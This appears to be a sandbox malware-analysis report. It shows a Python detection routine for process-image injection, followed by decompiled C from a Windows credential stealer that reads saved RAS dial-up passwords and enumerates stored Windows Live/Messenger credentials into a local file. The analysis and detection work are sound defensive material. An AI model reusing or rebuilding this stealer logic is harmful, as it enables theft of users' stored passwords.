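    {"api": "WriteProcessMemory", "hProcess": 0x1C8, "lpBaseAddress": 0x00400000, "nSize": 0x00058000},
    {"api": "CreateRemoteThread", "hProcess": 0x1C8},
    # an unrelated 4-byte write on another handle never completes the chain
    {"api": "WriteProcessMemory", "hProcess": 0x2F0, "lpBaseAddress": 0x7FFE0000, "nSize": 4},
]

if __name__ == "__main__":
    base, size = pe_image_base_and_size(FAKE_IMAGE)
    print(f"ImageBase=0x{base:08X} SizeOfImage=0x{size:X}")
    print("injection on handles:", [hex(h) for h in find_image_injection(SAMPLE_TRACE, base, size)])
```

                                    The correlation deliberately keys on the size and address agreeing with the injector's own headers rather than on the API names alone: a debugger or a legitimate loader also calls WriteProcessMemory and CreateRemoteThread, but a commit-and-reserve of exactly SizeOfImage bytes at the caller's own ImageBase with PAGE_EXECUTE_READWRITE, preceded by a MEM_RELEASE of that same address, is characteristic of this image-copy technique.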

                                    C-Code - Quality: 100%
                                    			E00404E10() {
                                    
                                    				if( *0x40e944 == 0) {                                    // kernel32 handle cached at 0x40e944; resolve the Tool Help exports once
                                    					 *0x40e944 = GetModuleHandleA("kernel32.dll");
                                    					if( *0x40e944 != 0) {
                                    						 *0x40e948 = GetProcAddress( *0x40e944, "CreateToolhelp32Snapshot");
                                    						 *0x40e94c = GetProcAddress( *0x40e944, "Heap32ListFirst");
                                    						 *0x40e950 = GetProcAddress( *0x40e944, "Heap32ListNext");
                                    						 *0x40e954 = GetProcAddress( *0x40e944, "Heap32First");
                                    						 *0x40e958 = GetProcAddress( *0x40e944, "Heap32Next");
                                    						 *0x40e95c = GetProcAddress( *0x40e944, "Toolhelp32ReadProcessMemory");
                                    						 *0x40e960 = GetProcAddress( *0x40e944, "Process32First");
                                    						 *0x40e964 = GetProcAddress( *0x40e944, "Process32Next");
                                    						 *0x40e968 = GetProcAddress( *0x40e944, "Process32FirstW");
                                    						 *0x40e96c = GetProcAddress( *0x40e944, "Process32NextW");
                                    						 *0x40e970 = GetProcAddress( *0x40e944, "Thread32First");
                                    						 *0x40e974 = GetProcAddress( *0x40e944, "Thread32Next");
                                    						 *0x40e978 = GetProcAddress( *0x40e944, "Module32First");
                                    						 *0x40e97c = GetProcAddress( *0x40e944, "Module32Next");
                                    						 *0x40e980 = GetProcAddress( *0x40e944, "Module32FirstW");
                                    						 *0x40e984 = GetProcAddress( *0x40e944, "Module32NextW");
                                    					}
                                    				}
                                    				if( *0x40e944 == 0 ||  *0x40e948 == 0) {              // usable only if kernel32 and CreateToolhelp32Snapshot both resolved
                                    					return 0;
                                    				} else {
                                    					return 1;
                                    				}
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00405097,?,00000000,0040520D,00000000,004052C4), ref: 00404E24
                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00404E3C
                                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 00404E4E
                                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00404E60
                                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 00404E72
                                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 00404E84
                                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 00404E96
                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00404EA8
                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00404EBA
                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00404ECC
                                    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00404EDE
                                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00404EF0
                                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00404F02
                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00404F14
                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00404F26
                                    • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 00404F38
                                    • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 00404F4A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$HandleModule
                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                    • API String ID: 667068680-597814768
                                    • Opcode ID: ba10ce1c238db4b831d24003e7457fdab4bee255a78ea434dca1328541456aef
                                    • Instruction ID: fe5771f8beb9365a204d6e2904ce85914b9e0a1e64c90e6c75949bdee210121a
                                    • Opcode Fuzzy Hash: ba10ce1c238db4b831d24003e7457fdab4bee255a78ea434dca1328541456aef
                                    • Instruction Fuzzy Hash: D531D7F0A01710ABEB60AFB69986A2A3BA8EB857057140D77B100FF2D5C67D8D508B5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 76%
                                    			E0040822C(void* __eax, void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a82) {
                                    				intOrPtr _v4;
                                    				signed int _v8;
                                    				signed int _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				signed int _v24;
                                    				signed int _v28;
                                    				signed int _v32;
                                    				char _v36;
                                    				signed int _v40;
                                    				signed int _v44;
                                    				signed int _v48;
                                    				signed int _v52;
                                    				signed int _v56;
                                    				struct _OSVERSIONINFOA _v200;
                                    				char _v476;
                                    				char _v733;
                                    				char _v1248;
                                    				char _v1252;
                                    				signed int _v3020;
                                    				signed int _v3024;
                                    				signed int _v3028;
                                    				signed int _v3032;
                                    				signed int _v3036;
                                    				char _v3284;
                                    				char _v3288;
                                    				char _v3292;
                                    				signed int _v3296;
                                    				signed int _v3300;
                                    				intOrPtr* _t114;
                                    				void* _t131;
                                    
                                    				_push(__ebx);
                                    				_push(__edx | _a82);
                                    				asm("popad");
                                    				if(__ecx + 1 < 0) {
                                    					_t131 = __eax;
                                    					_t114 = E0040806C("RasGetEntryProperties", __ebx, __eax);
                                    					return  *_t114(_t131, __edi, _v4, _a16, _a12, _a8);
                                    				} else {
                                    					_push(__ebp);
                                    					__ebp = __esp;
                                    					__esp = __esp + 0xfffff328;
                                    					_push(__ebx);
                                    					_push(__esi);
                                    					_push(__edi);
                                    					__edx = 0;
                                    					_v3296 = 0;
                                    					_v3300 = 0;
                                    					_v3036 = 0;
                                    					_v3032 = 0;
                                    					_v32 = 0;
                                    					_v36 = 0;
                                    					_v40 = 0;
                                    					_v48 = 0;
                                    					_v52 = 0;
                                    					_v56 = 0;
                                    					_v16 = __eax;
                                    					__eax = 0;
                                    					_push(__ebp);
                                    					_push(0x40861b);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = __esp;
                                    					_v16 = E00401AC0(_v16);
                                    					_v28 = E00407FF0();
                                    					__eflags = _v28;
                                    					if(_v28 != 0) {
                                    						__eax = _v20;
                                    						_push(_v20);
                                    						__eax =  &_v24;
                                    						__ecx = 1;
                                    						__edx =  *0x408214; // 0x408218
                                    						__eax = E00402FBC();
                                    						__esp = __esp + 4;
                                    						__edx = _v24;
                                    						__eax = 0x108;
                                    						 *_v24 = 0x108;
                                    						__edx = 0x108 * _v20 >> 0x20;
                                    						__eax = 0x108 * _v20;
                                    						_v12 = 0x108 * _v20;
                                    						__eax =  &_v20;
                                    						_push( &_v20);
                                    						__eax =  &_v12;
                                    						_push( &_v12);
                                    						__eax = _v24;
                                    						_push(__eax);
                                    						_push(0);
                                    						_push(0);
                                    						L00407B84();
                                    						__eflags = __eax;
                                    						if(__eax == 0) {
                                    							_v200.dwOSVersionInfoSize = 0x94;
                                    							 &_v200 = GetVersionExA( &_v200);
                                    							__eax =  &_v28;
                                    							__edx = 0x105;
                                    							__eax = E00402074( &_v28, 0x105);
                                    							__eax =  &_v32;
                                    							__edx = 0x105;
                                    							__eax = E00402074( &_v32, 0x105);
                                    							__eflags = _v200.dwPlatformId - 2;
                                    							if(_v200.dwPlatformId == 2) {
                                    								__eflags = _v200.dwMajorVersion - 5;
                                    								if(_v200.dwMajorVersion >= 5) {
                                    									_push(0);
                                    									_push(0x1a);
                                    									__eax =  &_v28;
                                    									__eax = E00401F9C( &_v28);
                                    									_push(__eax);
                                    									_push(0);
                                    									L00407B7C();
                                    									__eflags = __eax;
                                    									if(__eflags != 0) {
                                    										__edx =  &_v3024;
                                    										_v28 = E00407F4C(_v28,  &_v3024, __eflags);
                                    										__edx = _v3024;
                                    										 &_v28 = E00401B58( &_v28, _v3024);
                                    									}
                                    									_push(0);
                                    									_push(0x23);
                                    									__eax =  &_v32;
                                    									__eax = E00401F9C( &_v32);
                                    									_push(__eax);
                                    									_push(0);
                                    									L00407B7C();
                                    									__eflags = __eax;
                                    									if(__eflags != 0) {
                                    										__edx =  &_v3028;
                                    										_v32 = E00407F4C(_v32,  &_v3028, __eflags);
                                    										__edx = _v3028;
                                    										 &_v32 = E00401B58( &_v32, _v3028);
                                    									}
                                    									__eax = E00407E40(__ebx, __ecx, __edi, __esi, __eflags);
                                    								}
                                    							}
                                    							_v36 = 0xffffffff;
                                    							__eax = _v20;
                                    							__eax = _v20 - 1;
                                    							__eflags = __eax;
                                    							if(__eax >= 0) {
                                    								_v52 = __eax;
                                    								__esi = 0;
                                    								__eflags = 0;
                                    								do {
                                    									_v1252 = 0x41c;
                                    									__esi = __esi << 5;
                                    									__ebx = (__esi << 5) + __esi;
                                    									__eax = _v24;
                                    									__eax = _v24 + 4 + __ebx * 8;
                                    									__edx =  &_v1248;
                                    									__ecx = 0x100;
                                    									E00401258(_v24 + 4 + __ebx * 8, 0x100,  &_v1248) =  &_v36;
                                    									_push( &_v36);
                                    									__eax =  &_v1252;
                                    									_push( &_v1252);
                                    									_push(0);
                                    									L00407B8C();
                                    									_v12 = 0x6e8;
                                    									__eax =  &_v3020;
                                    									__ecx = 0;
                                    									__edx = _v12;
                                    									E00401414( &_v3020, _v12) = _v12;
                                    									_v3020 = _v12;
                                    									 &_v12 =  &_v16;
                                    									__eax = _v24;
                                    									__edx = _v24 + 4 + __ebx * 8;
                                    									__ecx =  &_v3020;
                                    									0 = E004081BC(0, _v24 + 4 + __ebx * 8,  &_v16, 0,  &_v12);
                                    									__eflags = _v200.dwPlatformId - 2;
                                    									if(_v200.dwPlatformId == 2) {
                                    										__eflags = _v200.dwMajorVersion - 5;
                                    										if(_v200.dwMajorVersion >= 5) {
                                    											__eax = _v28;
                                    											__eflags =  *_v28;
                                    											if( *_v28 != 0) {
                                    												L17:
                                    												__eax =  &_v40;
                                    												__edx =  &_v1248;
                                    												__eax = E00401CAC( &_v40,  &_v1248);
                                    												__edx =  &_v44;
                                    												_v40 = E00403268(_v40, __ebx, __ecx,  &_v44, __esi, __eflags);
                                    												 &_v28 = E00401F9C( &_v28);
                                    												__eax = _v40;
                                    												__eax = E00401F48(_v40);
                                    												__edi = __eax;
                                    												__ebx = __eax;
                                    												__eflags = __ebx;
                                    												if(__ebx == 0) {
                                    													__eax =  &_v32;
                                    													__eax = E00401F9C( &_v32);
                                    													__ebx = __eax;
                                    												}
                                    												__eflags = __ebx;
                                    												if(__ebx == 0) {
                                    													 &_v28 = E00401F9C( &_v28);
                                    													__eax = _v44;
                                    													__eax = E00401F48(_v44);
                                    													__ebx = __eax;
                                    												}
                                    												__eflags = __ebx;
                                    												if(__ebx == 0) {
                                    													 &_v32 = E00401F9C( &_v32);
                                    													__eax = _v44;
                                    													__eax = E00401F48(_v44);
                                    													__ebx = __eax;
                                    												}
                                    												__eflags = __ebx;
                                    												if(__ebx > 0) {
                                    													__eax = __ebx;
                                    													__edx = 0;
                                    													__eflags = 0;
                                    													 &_v3284 = E00402BC0( &_v3284, __ebx, 0);
                                    													__edx =  &_v3284;
                                    													 &_v48 = E00401D18( &_v48,  &_v3284, __eflags);
                                    													__edi = 0x100;
                                    													__ebx = 0x40e9bc;
                                    													do {
                                    														__eax =  *__ebx;
                                    														__edx = _v48;
                                    														__eax = E00401E94( *__ebx, _v48);
                                    														if(__eflags == 0) {
                                    															__eflags =  *(__ebx + 4);
                                    															if( *(__ebx + 4) != 0) {
                                    																_t92 = __ebx + 4; // 0x0
                                    																__eax =  *_t92;
                                    																_push(E00401D50( *_t92));
                                    																_t93 = __ebx + 4; // 0x0
                                    																__eax =  *_t93;
                                    																__edx = E00401F48( *_t93);
                                    																__eax =  &_v476;
                                    																_pop(__ecx);
                                    																__eax = E00408038( &_v476, __ecx, __edx);
                                    															}
                                    														}
                                    														__ebx = __ebx + 8;
                                    														__edi = __edi - 1;
                                    														__eflags = __edi;
                                    													} while (__edi != 0);
                                    												}
                                    											} else {
                                    												__eax = _v32;
                                    												__eflags =  *_v32;
                                    												if( *_v32 != 0) {
                                    													goto L17;
                                    												}
                                    											}
                                    										}
                                    									}
                                    									__eax =  &_v733;
                                    									__eflags =  &_v733;
                                    									if( &_v733 != 0) {
                                    										__eax =  &_v476;
                                    										__eflags =  &_v476;
                                    										if( &_v476 != 0) {
                                    											__eax = _v8;
                                    											_push( *_v8);
                                    											_push("RAS Passwords |");
                                    											__eax =  &_v3288;
                                    											__edx =  &_v733;
                                    											__eax = E00401CAC( &_v3288,  &_v733);
                                    											_push(_v3288);
                                    											_push(0x40865c);
                                    											__eax =  &_v3292;
                                    											__edx =  &_v476;
                                    											__eax = E00401CAC( &_v3292,  &_v476);
                                    											_push(_v3292);
                                    											_push(0x40865c);
                                    											_push(0x408668);
                                    											__eax = _v8;
                                    											__edx = 7;
                                    											E00401E10();
                                    										}
                                    									}
                                    									__esi = __esi + 1;
                                    									_t105 =  &_v52;
                                    									 *_t105 = _v52 - 1;
                                    									__eflags =  *_t105;
                                    								} while ( *_t105 != 0);
                                    							}
                                    						}
                                    					}
                                    					__eax = 0;
                                    					__eflags = 0;
                                    					_pop(__edx);
                                    					_pop(__ecx);
                                    					_pop(__ecx);
                                    					 *[fs:eax] = __edx;
                                    					_push(E00408622);
                                    					__eax =  &_v3292;
                                    					__edx = 2;
                                    					__eax = E00401AE4( &_v3292, 2);
                                    					__eax =  &_v3028;
                                    					__edx = 2;
                                    					__eax = E00401AE4( &_v3028, 2);
                                    					__eax =  &_v48;
                                    					__edx = 3;
                                    					__eax = E00401AE4( &_v48, 3);
                                    					__eax =  &_v32;
                                    					__edx = 2;
                                    					__eax = E00401AE4( &_v32, 2);
                                    					__eax =  &_v24;
                                    					__edx =  *0x408214; // 0x408218
                                    					return E00402FC8( &_v24, __edx);
                                    				}
                                    			}

                                    APIs
                                      • Part of subcall function 00407FF0: RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 00408017
                                    • RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 004082D5
                                    • GetVersionExA.KERNEL32(00000094), ref: 004082F3
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000094), ref: 00408333
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00408367
                                      • Part of subcall function 00407F4C: lstrlen.KERNEL32(00000000,?,?,0040837E,00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00407F68
                                    • RasGetEntryDialParamsA.RASAPI32(00000000,0000041C,FFFFFFFF), ref: 004083DF
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 00408484
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084A0
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084C4
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: PrivateProfile$EntriesEnumFolderPathSpecial$DialEntryParamsVersionlstrlen
                                    • String ID: DialParamsUID$RAS Passwords |$RasGetEntryProperties
                                    • API String ID: 606077693-541967613
                                    • Opcode ID: 1ab6e728647767d20885926d8c5f550152f1a8eb9b5063f4c77c40aaee44733b
                                    • Instruction ID: 6468358b1ab4b7f73c56054985f5742c7a8c8687d669c1df658abded6e8fa1dc
                                    • Opcode Fuzzy Hash: 1ab6e728647767d20885926d8c5f550152f1a8eb9b5063f4c77c40aaee44733b
                                    • Instruction Fuzzy Hash: 88C10F70A002199FDB10EBA5CD81BDEB7B9EF44308F1045BBE544B72D1DB78AE458B68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 69%
                                    			E00408238(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                    				intOrPtr* _v8;
                                    				signed int _v12;
                                    				char _v16;
                                    				signed int _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v52;
                                    				struct _OSVERSIONINFOA _v200;
                                    				char _v476;
                                    				char _v733;
                                    				char _v1248;
                                    				char _v1252;
                                    				signed int _v3020;
                                    				char _v3024;
                                    				char _v3028;
                                    				char _v3284;
                                    				char _v3288;
                                    				char _v3292;
                                    				char _t130;
                                    				void* _t138;
                                    				CHAR* _t167;
                                    				void* _t181;
                                    				CHAR* _t185;
                                    				CHAR* _t190;
                                    				void* _t199;
                                    				void* _t201;
                                    				int _t215;
                                    				intOrPtr* _t216;
                                    				signed int* _t222;
                                    				void* _t223;
                                    				intOrPtr _t225;
                                    				intOrPtr _t230;
                                    				CHAR* _t253;
                                    				void* _t254;
                                    				signed int _t256;
                                    				void* _t259;
                                    
                                    				_t255 = __esi;
                                    				_t252 = __edi;
                                    				_t211 = __ebx;
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_push(__edi);
                                    				_v3288 = 0;
                                    				_v3292 = 0;
                                    				_v3028 = 0;
                                    				_v3024 = 0;
                                    				_v24 = 0;
                                    				_v28 = 0;
                                    				_v32 = 0;
                                    				_v40 = 0;
                                    				_v44 = 0;
                                    				_v48 = 0;
                                    				_v8 = __eax;
                                    				_push(_t259);
                                    				_push(0x40861b);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t259 + 0xfffff328;
                                    				E00401AC0(_v8);
                                    				_v20 = E00407FF0();
                                    				if(_v20 != 0) {
                                    					_push(_v20);
                                    					E00402FBC();
                                    					 *_v24 = 0x108;
                                    					_v12 = 0x108 * _v20;
                                    					_push( &_v20);
                                    					_push( &_v12);
                                    					_t130 = _v24;
                                    					_push(_t130);
                                    					_push(0);
                                    					_push(0);
                                    					L00407B84();
                                    					if(_t130 == 0) {
                                    						_v200.dwOSVersionInfoSize = 0x94;
                                    						GetVersionExA( &_v200);
                                    						E00402074( &_v28, 0x105);
                                    						E00402074( &_v32, 0x105);
                                    						if(_v200.dwPlatformId == 2 && _v200.dwMajorVersion >= 5) {
                                    							_push(0);
                                    							_push(0x1a);
                                    							_t199 = E00401F9C( &_v28);
                                    							_push(_t199);
                                    							_push(0);
                                    							L00407B7C();
                                    							_t267 = _t199;
                                    							if(_t199 != 0) {
                                    								E00407F4C(_v28,  &_v3024, _t267);
                                    								E00401B58( &_v28, _v3024);
                                    							}
                                    							_push(0);
                                    							_push(0x23);
                                    							_t201 = E00401F9C( &_v32);
                                    							_push(_t201);
                                    							_push(0);
                                    							L00407B7C();
                                    							_t268 = _t201;
                                    							if(_t201 != 0) {
                                    								E00407F4C(_v32,  &_v3028, _t268);
                                    								E00401B58( &_v32, _v3028);
                                    							}
                                    							E00407E40(_t211, 1, _t252, _t255, _t268);
                                    						}
                                    						_v36 = 0xffffffff;
                                    						_t138 = _v20 - 1;
                                    						if(_t138 >= 0) {
                                    							_v52 = _t138 + 1;
                                    							_t256 = 0;
                                    							do {
                                    								_v1252 = 0x41c;
                                    								_t214 = (_t256 << 5) + _t256;
                                    								E00401258(_v24 + 4 + ((_t256 << 5) + _t256) * 8, 0x100,  &_v1248);
                                    								_push( &_v36);
                                    								_push( &_v1252);
                                    								_push(0);
                                    								L00407B8C();
                                    								_v12 = 0x6e8;
                                    								E00401414( &_v3020, _v12);
                                    								_v3020 = _v12;
                                    								_t222 =  &_v3020;
                                    								E004081BC(0, _v24 + 4 + ((_t256 << 5) + _t256) * 8,  &_v16, 0,  &_v12);
                                    								if(_v200.dwPlatformId == 2 && _v200.dwMajorVersion >= 5) {
                                    									if( *_v28 != 0) {
                                    										L15:
                                    										E00401CAC( &_v40,  &_v1248);
                                    										E00403268(_v40, _t214, _t222,  &_v44, _t256, _t274);
                                    										_t167 = E00401F9C( &_v28);
                                    										_t253 = E00401F48(_v40);
                                    										_t215 = GetPrivateProfileIntA(_t253, "DialParamsUID", 0, _t167);
                                    										if(_t215 == 0) {
                                    											_t215 = GetPrivateProfileIntA(_t253, "DialParamsUID", 0, E00401F9C( &_v32));
                                    										}
                                    										if(_t215 == 0) {
                                    											_t190 = E00401F9C( &_v28);
                                    											_t215 = GetPrivateProfileIntA(E00401F48(_v44), "DialParamsUID", 0, _t190);
                                    										}
                                    										if(_t215 == 0) {
                                    											_t185 = E00401F9C( &_v32);
                                    											_t215 = GetPrivateProfileIntA(E00401F48(_v44), "DialParamsUID", 0, _t185);
                                    										}
                                    										if(_t215 > 0) {
                                    											E00402BC0( &_v3284, _t215, 0);
                                    											E00401D18( &_v48,  &_v3284, 0);
                                    											_t254 = 0x100;
                                    											_t216 = 0x40e9bc;
                                    											do {
                                    												E00401E94( *_t216, _v48);
                                    												if(0 == 0 &&  *((intOrPtr*)(_t216 + 4)) != 0) {
                                    													_t87 = _t216 + 4; // 0x0
                                    													_push(E00401D50( *_t87));
                                    													_t88 = _t216 + 4; // 0x0
                                    													_t181 = E00401F48( *_t88);
                                    													_pop(_t223);
                                    													E00408038( &_v476, _t223, _t181);
                                    												}
                                    												_t216 = _t216 + 8;
                                    												_t254 = _t254 - 1;
                                    											} while (_t254 != 0);
                                    										}
                                    									} else {
                                    										_t274 =  *_v32;
                                    										if( *_v32 != 0) {
                                    											goto L15;
                                    										}
                                    									}
                                    								}
                                    								if( &_v733 != 0 &&  &_v476 != 0) {
                                    									_push( *_v8);
                                    									_push("RAS Passwords |");
                                    									E00401CAC( &_v3288,  &_v733);
                                    									_push(_v3288);
                                    									_push(0x40865c);
                                    									E00401CAC( &_v3292,  &_v476);
                                    									_push(_v3292);
                                    									_push(0x40865c);
                                    									_push(0x408668);
                                    									E00401E10();
                                    								}
                                    								_t256 = _t256 + 1;
                                    								_t100 =  &_v52;
                                    								 *_t100 = _v52 - 1;
                                    							} while ( *_t100 != 0);
                                    						}
                                    					}
                                    				}
                                    				_pop(_t225);
                                    				 *[fs:eax] = _t225;
                                    				_push(E00408622);
                                    				E00401AE4( &_v3292, 2);
                                    				E00401AE4( &_v3028, 2);
                                    				E00401AE4( &_v48, 3);
                                    				E00401AE4( &_v32, 2);
                                    				_t230 =  *0x408214; // 0x408218
                                    				return E00402FC8( &_v24, _t230);
                                    			}

                                    APIs
                                      • Part of subcall function 00407FF0: RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 00408017
                                    • RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 004082D5
                                    • GetVersionExA.KERNEL32(00000094), ref: 004082F3
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000094), ref: 00408333
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00408367
                                      • Part of subcall function 00407F4C: lstrlen.KERNEL32(00000000,?,?,0040837E,00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00407F68
                                    • RasGetEntryDialParamsA.RASAPI32(00000000,0000041C,FFFFFFFF), ref: 004083DF
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 00408484
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084A0
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084C4
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: PrivateProfile$EntriesEnumFolderPathSpecial$DialEntryParamsVersionlstrlen
                                    • String ID: DialParamsUID$RAS Passwords |
                                    • API String ID: 606077693-3751168726
                                    • Opcode ID: fbe06dde2b49a42d26d1befe1d029615117769fb4e2dbfe38565cae11eece56a
                                    • Instruction ID: 7375f334a108091beab50651aa9ecc72c5d4f12faf085ce0e41049e672a00ba2
                                    • Opcode Fuzzy Hash: fbe06dde2b49a42d26d1befe1d029615117769fb4e2dbfe38565cae11eece56a
                                    • Instruction Fuzzy Hash: 45B12070E002199BDB10EFA5CD82BDEB7B9AF44308F1045BBE544B72D1DB78AE458B58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 60%
                                    			E00409D28(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				char _v12;
                                    				struct HINSTANCE__* _v16;
                                    				char _v20;
                                    				char _v24;
                                    				intOrPtr _v28;
                                    				char _v32;
                                    				char _v36;
                                    				void* _t47;
                                    				intOrPtr* _t70;
                                    				void* _t74;
                                    				intOrPtr _t76;
                                    				intOrPtr _t78;
                                    				signed int _t90;
                                    				void* _t91;
                                    				intOrPtr _t93;
                                    
                                    				_t89 = __esi;
                                    				_t70 = __eax;
                                    				 *[fs:eax] = _t93;
                                    				E00401AC0(__eax);
                                    				_v16 = LoadLibraryA("advapi32.dll");
                                    				 *0x40f1dc = GetProcAddress(_v16, "CredEnumerateA");
                                    				 *0x40f1e0 = GetProcAddress(_v16, "CredFree");
                                    				// CredEnumerateA(Filter = "WindowsLive:name=*", Flags = 0, &Count = _v12, &Credentials = _v8): returns every stored Windows Live credential as an array of CREDENTIALA pointers; the trailing arguments are decompiler stack noise
                                    				 *0x40f1dc("WindowsLive:name=*", 0,  &_v12,  &_v8,  *[fs:eax], 0x409e71, _t93, __edi, __esi, __ebx, 0, 0, 0, 0, 0, 0, 0, 0, _t91);
                                    				if(_v12 != 0) {
                                    					_t47 = _v12 - 1;
                                    					if(_t47 >= 0) {
                                    						_v20 = _t47 + 1;
                                    						_t90 = 0;
                                    						do {
                                    							_push( *_t70);
                                    							_push("Messenger|");
                                    							E00401CAC( &_v24,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t90 * 4)) + 0x30))); // Credentials[i]->UserName (CREDENTIALA offset 0x30 on 32-bit)
                                    							_push(_v24);
                                    							_push(0x409edc);
                                    							E00401E10();
                                    							_push( *_t70);
                                    							E00409C1C( *((intOrPtr*)( *((intOrPtr*)(_v8 + _t90 * 4)) + 0x1c)), _t70,  &_v32,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t90 * 4)) + 0x18)),  *((intOrPtr*)(_v8 + _t90 * 4)), _t90); // Credentials[i]->CredentialBlob (+0x1c) with CredentialBlobSize (+0x18): the stored secret
                                    							_push(_v32);
                                    							_push(0x409edc);
                                    							E00401E10();
                                    							E00401CAC(_t70, E00401F48(_v28));
                                    							_t90 = _t90 + 1;
                                    							_t21 =  &_v20;
                                    							 *_t21 = _v20 - 1;
                                    							_t97 =  *_t21;
                                    						} while ( *_t21 != 0);
                                    					}
                                    					FreeLibrary(_v16);
                                    					_push(E00401D50( *_t70));
                                    					E00406008( &_v36);
                                    					E00401D58( &_v36, "xxxyyyzzz.dat");
                                    					_pop(_t74);
                                    					E00405D70(_v36, _t70, _t74,  *_t70, _t89, _t97);
                                    				}
                                    				_pop(_t76);
                                    				 *[fs:eax] = _t76;
                                    				_push(E00409E78);
                                    				E00401AE4( &_v36, 4);
                                    				_t78 =  *0x409bec; // 0x409bf0
                                    				return E00402FC8( &_v8, _t78);
                                    			}

                                    APIs
